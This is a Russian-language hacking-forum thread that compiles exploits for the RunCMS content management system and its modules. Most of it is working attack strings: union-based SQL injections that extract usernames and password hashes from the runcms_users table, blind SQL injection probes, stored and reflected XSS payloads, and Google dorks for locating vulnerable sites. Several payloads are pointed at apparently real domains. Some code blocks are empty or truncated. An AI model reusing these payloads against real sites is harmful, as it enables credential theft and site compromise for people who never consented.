![]() |
[ Обзор уязвимостей RunCMS ]
Обзор уязвимостей RunCMS Сайт производителя: www.runcms.org Актуальная версия: 1.6.1 Exploits Цель: RunCMS <= 1.2 Воздействие: Выполнение произвольных команд RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit Цель: RunCms 1.5.2 и более ранние версии Воздействие: SQL-инъекция RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit Цель: RunCMS <= 1.6 Воздействие: Выполнение произвольных команд RunCMS <= 1.6 Local File Inclusion Vulnerability Цель: RunCMS 1.6 и более ранние версии Воздействие: Выполнение произвольных команд RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit Цель: RunCMS 1.6 Воздействие: SQL-инъекция RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit Цель: RunCMS 1.6 Воздействие: SQL-инъекция RunCMS 1.6 Remote Blind SQL Injection Exploit (IDS evasion) Цель: RunCMS Newbb_plus 0.92 и более ранние версии Воздействие: SQL-инъекция RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit 1. Multiple Blind SQL Injection Attacker can inject SQL code in modules: Код:
http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTIONThis query will return link to download file: Код:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0Код:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.02. Stored XSS Vulnerability found in script modules/news/submit.php in post parameter name "subject" Example: Код:
POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.03. Linked XSS vulnerability found in modules/news/index.php, attacker can inject XSS in URL string: Example: Код:
http://[server]/[installdir]/modules/news/index.php/"><script>alert('DSecRG_XSS')</script>3. This page can be overwritten by PHP injection: Код:
runcms_1.6\modules\sections\cache\intro.phpV. 1.3a5 XSS Код:
http://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code]RUNCMS 1.5.1 SQL Injection Код:
http://site.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt, 7,8,9,10+from+runcms_users+where+uid=2 |
Нашел слепую скулю в runcms, начал проверять боян ли, оказалось что скуля была найдена до меня, но на ачате нет, поэтому выкладываю, уязвимость в параметре "bid" сценария "modules/banners/click.php"
Пример: http://www.runcms.de/modules/banners/click.php?op=click&bid=3%20and%20substring(version (),1,1)=4 |
1) RunCMS MyAnnonces SQL Injection(cid)
Код:
# AUTHOR : S@BUN2) RunCMS 1.6.1 Multiple XSS and XSRF Код HTML:
################################################################### |
RUNCMS 1.6.1
Добавка комментария ----------------------------- Неправильная обработка BB Code => Active XSS Пример: Код:
[*color]</textarea>[XSS][/*color](Admin priv) Exploit: Код:
modules/partners/admin/index.php?op=edit_partner&id=-1/**/union/**/select/**/1,2,3,4,5,concat(uname,0x3a,pass),7/**/from+runcms_users/**/limit/**/0,1(Admin priv) Exploit: Код:
modules/mylinks/admin/index.php?op=modCat&cid=-1/**/union/**/select/**/1,concat(uname,0x3a,pass),3,4/**/from+runcms_users+limit+0,1PHP код:
|
RunCMS Module section (artid) Remote SQL Injection Vulnerability
Код:
Cr@zy_King |
RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability
SQL Injection
Vulnerable: Module Photo 3.02 Exploit: Код:
adminКод:
allinurl: "modules/photo/viewcat.php?id" |
RunCMS Module nGuestBook 1.01 Active XSS
Add message => Message => [XSS] dork: inurl:/modules/nguestbook/ SQL Injection Vulnerable: Module Photo 4.00 Vuln code: PHP код:
Код:
http://site.com/modules/photo/rateimg.php?id=-999999+union+select+pass+from+runcms_users+where+uid=1 |
RunCMS Module MyArticles 0.0.4-0.5 sql-inj
Sql-inj в параметре topic_id, GET фильтруется, поэтому данные нужно посылать POST-ом Код:
http://mobilefree.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users |
RunCMS Module MyArticles 0.6 Beta-1 SQL Injection Vulnerability
SQL Injection http://localhost/modules/myarticles/topics.php?op=listarticles&topic_id=[SQL] Код:
-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users |
RunCMS Module HotNews 2.00 (tid) Remote SQL Injection Vulnerability
Vuln code: PHP код:
Код:
/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_usersКод:
http://www.segacfecgc.info/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_usersZAMUT(c) |
| Время: 09:49 |